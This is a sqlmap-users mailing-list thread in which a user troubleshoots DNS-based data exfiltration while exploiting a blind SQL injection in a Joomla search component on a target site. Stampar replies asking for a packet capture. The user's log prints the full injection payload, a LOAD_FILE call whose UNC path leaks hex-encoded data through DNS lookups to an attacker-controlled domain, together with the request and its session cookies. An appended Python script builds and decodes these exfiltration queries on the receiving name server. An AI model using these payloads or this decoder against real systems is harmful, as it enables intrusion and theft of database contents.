Hi Chris.
It looks quite right. It would be tremendously helpful if you could send the
console output and a tcpdump capture (you can limit it to port 53 only) for the
following run:
sudo python sqlmap.py -u "...." --flush-session --banner --dns-domain="..."
From your description it looks like everything should be up and
running.
Kind regards,
Miroslav Stampar
On Thu, Jan 23, 2014 at 12:46 AM, Chris Clements <ccleme...@outlook.com> wrote:
> Hey all,
>
> I’ve got a blind sqli that I’m exploiting with the latest sqlmap commit
> and am trying to get dns exfil to work, but am not having any luck.
>
> I start sqlmap as root with the --dns-domain option set to a domain that I
> control and have the sqlmap machine set as the authoritative NS for.
> Running with a -v6, this is the info I get:
>
> ===============================================
> [18:22:18] [INFO] testing for data retrieval through DNS channel
> [18:22:18] [PAYLOAD] -2931 OR 7252=IF((ORD(MID((SELECT LOAD_FILE(CONCAT(0x5c5c5c5c4d776a2e,(SELECT HEX(MID((IFNULL(CAST(8315 AS CHAR),0x20)),1,31))),0x2e79564e2e73656375726566696c652e6e65745c5c7456414c))),6,1))>953),SLEEP(5),7252)-- PyBa
> [18:22:18] [TRAFFIC OUT] HTTP request [#3]:
> GET /administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate HTTP/1.1
> Accept-language: en-us,en;q=0.5
> Accept-encoding: gzip,deflate
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> User-agent: Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1)
> Gecko/2008071719 Firefox/3.0.1
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>
> Pragma: no-cache
> Cache-control: no-cache,no-store
> Cookie:
> Login=1;activeProfile=16469185;serviceID=1320;91370904fbecd1edf649755d657f5d32=97t8br06sreu9r846bai0t2pj0;mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec
> Connection: close
>
> [18:22:19] [TRAFFIC IN] HTTP response [#3] (200 OK):
> Content-length: 8627
> Content-encoding: gzip
> Set-cookie: serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; path=/;
> httponly, serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; path=/;
> httponly, mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec; expires=Thu,
> 22-Jan-2015 23:22:20 GMT; path=/; httponly
> Expires: Mon, 1 Jan 2001 00:00:00 GMT
> Vary: Accept-Encoding
> Uri:
> https://target.net:443/administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate
> Server: Apache
> Last-modified: Wed, 22 Jan 2014 23:22:20 GMT
> Connection: close
> Pragma: no-cache
> Cache-control: post-check=0, pre-check=0
> Date: Wed, 22 Jan 2014 23:22:20 GMT
> P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
> Content-type: text/html; charset=utf-8
>
> [18:22:19] [DEBUG] performed 1 queries in 0.51 seconds
> [18:22:19] [ERROR] data retrieval through DNS channel failed. Turning off
> DNS exfiltration support
> ===============================================
>
> If I run a tcpdump on the sqlmap machine, I see dns requests come in for
> “target.net” and if I do manual dns queries to the domain I own, sqlmap
> responds as expected with localhost.domain.com.
>
>
> Any idea? Am I doing anything wrong?
>
>
> Chris
>
>
>
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
--
Miroslav Stampar
http://about.me/stamparm
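As an added illustration, not sqlmap's own code and not part of either message above, the following Python script mirrors what the LOAD_FILE payload in Chris's log asks the database host to do: decode the two hex literals from that payload (they turn out to be a UNC path prefix "\\\\Mwj." and suffix ".yVN.securefile.net\\tVAL"), wrap the probe value 8315 in them the way CONCAT(0x..., HEX(MID(...,1,31)), 0x...) does, build the DNS query the database server's resolver would emit for the host part of that path (wire format, the same bytes a tcpdump on port 53 would show), and recover the hex-encoded value from the QNAME on the authoritative side. The prefix "Mwj", suffix "yVN" and domain securefile.net are taken from this one payload (sqlmap randomises them per query); the query ID and the choice of an A query are assumptions for the sample packet.

```python
"""Decode the DNS-exfiltration name built by a MySQL LOAD_FILE payload.

Added example, not sqlmap's code. Constants below are lifted from the
payload quoted in the thread; everything else is an assumption for
illustration.
"""
import binascii
import re
import struct

# Hex literals copied verbatim from the CONCAT(...) in the payload.
PREFIX_HEX = "5c5c5c5c4d776a2e"                                    # "\\\\Mwj."
SUFFIX_HEX = "2e79564e2e73656375726566696c652e6e65745c5c7456414c"  # ".yVN.securefile.net\\tVAL"


def mysql_hex_literal(hexlit):
    """Decode a MySQL 0x... literal into the characters CONCAT() emits.
    Hex literals are not subject to backslash-escape processing, so every
    5c byte is a literal backslash."""
    return binascii.unhexlify(hexlit).decode("latin-1")


def build_unc_path(value, prefix_hex=PREFIX_HEX, suffix_hex=SUFFIX_HEX):
    """Mirror CONCAT(0x<prefix>, HEX(MID(value,1,31)), 0x<suffix>).
    MID() takes at most 31 characters of the value; HEX() then emits
    upper-case hex, so one query carries at most 62 hex digits."""
    chunk = value[:31].encode("latin-1").hex().upper()
    return mysql_hex_literal(prefix_hex) + chunk + mysql_hex_literal(suffix_hex)


def hostname_from_unc(path):
    """Return the host component of \\\\host\\share: the name the database
    host's resolver must look up before LOAD_FILE can open the path."""
    return path.lstrip("\\").split("\\", 1)[0]


def dns_query(qname, qid=0x1234):
    """Build a minimal DNS A query (RD set) for qname, as the victim's
    resolver would send it towards the authoritative server (assumed format)."""
    header = struct.pack(">HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    labels = b"".join(struct.pack("B", len(lbl)) + lbl.encode("ascii")
                      for lbl in qname.split("."))
    return header + labels + b"\x00" + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN


def parse_qname(packet):
    """Walk the labels of the first question in a DNS packet. Question
    names are never compressed, so a pointer byte means a malformed packet."""
    (qdcount,) = struct.unpack(">H", packet[4:6])
    if qdcount < 1:
        raise ValueError("no question section")
    pos, labels = 12, []
    while True:
        length = packet[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compressed label in question section")
        labels.append(packet[pos:pos + length].decode("ascii"))
        pos += length
    return ".".join(labels)


def extract_exfil(qname, prefix="Mwj", suffix="yVN.securefile.net"):
    """Recover the value from <prefix>.<hex>.<suffix>; None for unrelated
    queries (e.g. a lookup of the target's own host name). Matching is
    case-insensitive because resolvers may randomise QNAME case."""
    pattern = re.compile(r"^%s\.([0-9a-f]+)\.%s\.?$"
                         % (re.escape(prefix.lower()), re.escape(suffix.lower())))
    match = pattern.match(qname.lower())
    if not match or len(match.group(1)) % 2:
        return None
    return binascii.unhexlify(match.group(1)).decode("latin-1")


if __name__ == "__main__":
    path = build_unc_path("8315")          # 8315 is the probe constant in the payload
    host = hostname_from_unc(path)
    packet = dns_query(host)
    print("UNC path LOAD_FILE tries to open:", path)
    print("QNAME on the wire (port 53):     ", parse_qname(packet))
    print("Value recovered by the NS side:  ", extract_exfil(parse_qname(packet)))
```

Pointing extract_exfil at the QNAMEs seen in a port-53 capture is a quick way to tell whether the database host ever asked for a name of this shape: a query that carries only the target's own host name matches nothing and is not the exfiltration lookup the payload was trying to trigger.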